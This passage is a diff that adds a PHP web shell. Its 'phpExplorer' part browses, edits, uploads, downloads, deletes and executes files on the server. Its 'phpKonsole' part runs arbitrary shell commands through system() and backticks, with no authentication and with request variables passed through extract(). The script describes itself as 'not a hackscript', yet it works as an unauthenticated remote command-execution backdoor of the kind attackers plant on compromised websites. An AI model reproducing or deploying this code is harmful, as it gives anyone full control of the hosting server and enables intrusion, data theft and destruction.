BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + } + .inputtext { + background-color: #EFEFEF; + font-family: arial, helvetica; + border: 1px solid #000000; + height: 20; + } + .lighttd { background: #F8F8F8; + } + .darktd { background: #E8E8E8; + } + input { font-family: arial, helvetica; + } + .inputbutton { + background-color: silver; + border: 1px solid #000000; + border-width: 1px; + height: 20; + } + .inputtextarea { + background-color: #EFEFEF; + border: 1px solid #000000; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: #EFEFEF; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: #EFEFEF; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: #EFEFEF; + scrollbar-arrow-color: black; + } + .top { BORDER-TOP: black 1px solid; } + .textin { BORDER-LEFT: silver 1px solid; + BORDER-RIGHT: silver 1px solid; + BORDER-TOP: silver 1px solid; + BORDER-BOTTOM: silver 1px solid; + width: 99%; font-size: 12px; font-weight: bold; color: navy; + } + .notop { BORDER-TOP: black 0px solid; } + .bottom { BORDER-BOTTOM: black 1px solid; } + .nobottom { BORDER-BOTTOM: black 0px solid; } + .left { BORDER-LEFT: black 1px solid; } + .noleft { BORDER-LEFT: black 0px solid; } + .right { BORDER-RIGHT: black 1px solid; } + .noright { BORDER-RIGHT: black 0px solid; } + .silver{ BACKGROUND: silver; } + --> + </STYLE> + <TITLE><?php echo $SFileName ?></TITLE> + </HEAD> + <body topmargin="0" leftmargin="0"> + <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;"> + <table width=100% height="100%" NOWRAP border="0"> + <tr NOWRAP> + <td width="100%" NOWRAP> + <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center> + <strong> + <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> + </strong> + </center> + </td> + </tr> + </table><br> + + <?php +} + +if ( $cmd=="dir" ) { + $h=@opendir($dir); + if ($h == false) { + echo "<br><font color=\"red\">".sp(3)."\n\n\n\n + COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n + THE SCRIPT WILL RESULT IN AN ERROR!!! + <br><br>".sp(3)."\n + PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR... + <br><br></font>\n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> + <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir"> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;phpExplorer - Server file browser...&nbsp;</center> + </td> + </tr> + </table> + <br> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td class="border nobottom noright"> + &nbsp;Browsing:&nbsp; + </td> + <td width="100%" class="border nobottom noleft"> + <table width="100%" border="0" cellpadding="1" cellspacing="0"> + <tr> + <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td> + <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td> + </tr> + </table> + + </td> + </tr> + </table> + <!-- </form> --> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" > + <tr> + <td width="100%" NOWRAP class="silver border"> + &nbsp;Filename&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Actions&nbsp;(Attempt to perform)&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Size&nbsp; + </td> + <td width=1 NOWRAP class="silver border noleft"> + &nbsp;Attributes&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Modification Date&nbsp; + </td> + <tr> + <?php + + + /* <!-- This whole heap of junk is the sorting section... */ + + $dirn = array(); + $filen = array(); + $filesizes = 0; + while ($buf = readdir($h)) { + if (is_dir("$dir/$buf")) + $dirn[] = $buf; + else + $filen[] = $buf; + } + $dirno = count($dirn) + 1; + $fileno = count($filen) + 1; + + function mycmp($a, $b){ + if ($a == $b) return 0; + return (strtolower($a) < strtolower($b)) ? -1 : 1; + } + + if (function_exists("usort")) { + usort($dirn, "mycmp"); + usort($filen, "mycmp"); + } + else { + sort ($dirn); + sort ($filen); + } + reset ($dirn); + reset ($filen); + if (function_exists('array_merge')) { + $filelist = array_merge ($dirn, $filen); + } + else { + $filelist = $dirn + $filen; + } + + + if ( count($filelist)-1 > $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */ + /* <!-- Dirname --> */ + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n"; + /* <!-- Rename --> */ + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Delete --> */ + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- End of Actions --> */ + echo "&nbsp;&nbsp;</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n"; + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + echo "<strong>D</strong>"; + if ( @is_readable("$dir/$file") ) { + echo "<strong>R</strong>"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo "<strong>W</stong>"; + } + } + else { + echo "<strong>(W)</stong>"; + } + if ( @is_executable("$dir/$file") ) { + echo "<Strong>X<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + + } + else { /* <!-- Then it must be a File... --> */ + /* <!-- Filename --> */ + if ( @is_readable("$dir/$file") ) + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n"; + else + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n"; + /* <!-- Rename --> */ + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Edit --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + /* <!-- Copy --> */ + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + /* <!-- Move --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + /* <!-- Delete --> */ + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- Download --> */ + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + /* <!-- Execute --> */ + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + /* <!-- End of Actions --> */ + echo sp(2)."</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>"; + } + else + echo "&nbsp;&nbsp;<strong>0 B<strong>"; + echo "&nbsp;&nbsp;</td>\n"; + + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + + if ( @is_readable("$dir/$file") ) + echo "<strong>R</strong>"; + if ( @is_writeable("$dir/$file") ) + echo "<strong>W</stong>"; + if ( @is_executable("$dir/$file") ) + echo "<Strong>X<strong>"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "<Strong>U<strong>"; + } + else { + echo "<Strong>(U)<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + } + } + + echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n"; + echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n"; + echo "</td><td NOWRAP class=\"silver border noleft\">\n"; + echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>"; + else + echo "<b>| $a - $b |</b>"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>"; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "&nbsp;&nbsp;&nbsp;"; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "</center></td></tr></table></td></tr>"; + } + + + echo "</table>\n<br><table NOWRAP>"; + + if ($isGoodver) { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n"; + } + else { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n"; + } + /* <!-- Other Actions --> */ + echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n"; + echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n"; + echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n"; + echo "<table NOWRAP>"; + echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n"; + echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n"; + echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n"; + echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n"; + echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n"; + echo "</table></td>"; + echo "</table>"; + echo "<br>"; + @closedir($h); + } + elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/ + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */ + echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"<br>Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to phpExplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"deldir\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} + elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"<br>"; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to phpExplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" ? + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"delfile\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} +elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */ + echo "<center><table><tr><td NOWRAP>"; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...<br>"; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>"; + echo " + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to phpExplorer\"> + </form></center> + </td></tr></table></center> "; + } +elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */ + echo "<center><table><tr><td NOWRAP>" ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...<br>"; + else + echo "Successfully created: \"$lastdir/newdir$i\"<br>"; + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to phpExplorer\"> + </form></center></td></tr></table></center>"; +} +elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */ + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "<br><center><table><tr><td NOWRAP>"; + echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n"; + echo "<strong>EDIT FILE: </strong>$file<br>\n"; + echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n"; + echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n"; + echo "<input type=\"submit\" value=\"Save\">"; + echo "</form>"; + echo "</td></tr></table></center>"; +} +elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */ + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */ + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ + ?> + <center> + <table> + <tr> + <td NOWRAP> + Welcome to the upload section... + Please note that the destination file will be + <br> overwritten if it already exists!!!<br><br> + <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post"> + <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776"> + <input type="hidden" name="cmd" value="uploadproc"> + <input type="hidden" name="dir" value="<?php echo $dir ?>"> + <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>"> + Select local file:<br> + <input size="75" name="userfile" type="file"><br> + <input type="submit" value="Send File"> + </form> + <br> + <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST"> + <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="dir" value="<?php echo $lastdir ?>"> + <input tabindex="0" type="submit" value="Cancel"> + </form> + </td> + </tr> + </table> + </center> + + <?php +} +elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */ + echo "<center><table><tr><td NOWRAP>"; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n"; + if ($res) { + echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>"; + echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>"; + echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>"; + } + else { + echo "Could not move uploaded file; Action aborted..."; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to phpExplorer\"></form></center>" ; + echo "<br><br></td></tr></table></center>"; +} +elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */ + echo "<hr>"; + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."<br>\n"; + } + echo "<hr>"; +} +elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */ + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n"; + If (empty($newfile) != true) { + echo "<center>"; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to phpExplorer\"></form></center>" ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n"; + echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n"; + echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n"; + echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n"; + echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n"; + echo "Rename \"$oldfile\" to:<br>\n"; + echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; + echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>"; + echo "</td></tr></table></center>"; + } +} +else if ( $cmd == "con") { + +?> +<center> +<table> + <tr><td> +<h3>PHPKonsole</h3> + +<?php + +if (ini_get('register_globals') != '1') { + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); + } + + if (!empty($work_dir)) { + if (!empty($command)) { + if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + if ($regs[1][0] == '/') { + $new_dir = $regs[1]; + } else { + $new_dir = $work_dir . '/' . $regs[1]; + } + if (file_exists($new_dir) && is_dir($new_dir)) { + $work_dir = $new_dir; + } + unset($command); + } + } + } + if (file_exists($work_dir) && is_dir($work_dir)) { + chdir($work_dir); + } + $work_dir = exec('pwd'); +?> + + <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post"> + <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b> + <input type="hidden" name="cmd" value="con"> + <?php + $work_dir_splitted = explode('/', substr($work_dir, 1)); + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr); + if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . $work_dir_splitted[$i]; + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); + } + } + ?></b></td> + <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()"> + + <?php + $dir_handle = opendir($work_dir); + while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == '.') { + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + } elseif ($dir == '..') { + if (strlen($work_dir) == 1) { + } + elseif (strrpos($work_dir, '/') == 0) { + echo "<option value=\"/\">Parent Directory</option>\n"; + } else { + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } else { + if ($work_dir == '/') { + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + } else { + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } + } + closedir($dir_handle); + ?> + </select></td></tr></table> + <p>Command: <input class="inputtext" type="text" name="command" size="60"> + <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p> + <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p> + <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php + if (!empty($command)) { + echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; + if ($stderr) { + $tmpfile = tempnam('/tmp', 'phpshell'); + $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile"; + } else if ($command == 'ls') { + $command .= ' -F'; + } + $output = `$command`; + echo htmlspecialchars($output); + } + ?></textarea> + </form> + + <script language="JavaScript" type="text/javascript"> + document.forms[0].command.focus(); + </script> + </td></tr></table> +<?php +} +else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */ + $isMainMenu = true; + ?> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="border"> + <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center> + </td> + </tr> + </table> + <br> + <center> + <table border="0" NOWRAP> + <tr> + <td valign="top" class="silver border"> + <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> phpExplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?> + </td> + <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP> + phpExplorer is a server side file browser wich uses the directory object to list the files and directories stored on a webserver. + This handy tools allows you to manage your files and directories on a server with php support. This script does NOT use exploits or any other hacks to display and manage the files and directories on a + server. If you do not have enough access rights on the server, the script will hide commands or will even return errors to your browser... In other words, this is not a hackscript and merely a simple file browser.<BR><BR> + </td> + </tr> + <tr> + <td valign="top" class="silver border"> + <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> phpKonsole <==</strong></font>", "cmd=con").sp(2); ?> + </td> + <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP> + <br>phpKonsole is just a little telnet like shell wich allows you to run commands on the webserver. + When you run commands they will run as the webservers UserID. This should work perfectly + for managing files, like moving, copying etc. If you're using a linux server, system commands + such as ls, mv and cp will be available for you... <br><br>This function will only work if the + server supports php and the execute commands...<br><br> + </td> + </tr> + </table> + </center> + <br> + <?php +} + +if ($cmd != "downl") { + if ( $isMainMenu != true) { + ?> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" style="class="silver border"> + <center><strong> + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp; + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;phpKonsole&nbsp;] </font>", "cmd=con"); ?>&nbsp;&nbsp; + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;phpExplorer&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp; + </strong></center> + </td> + </tr> + </table> + <br> + 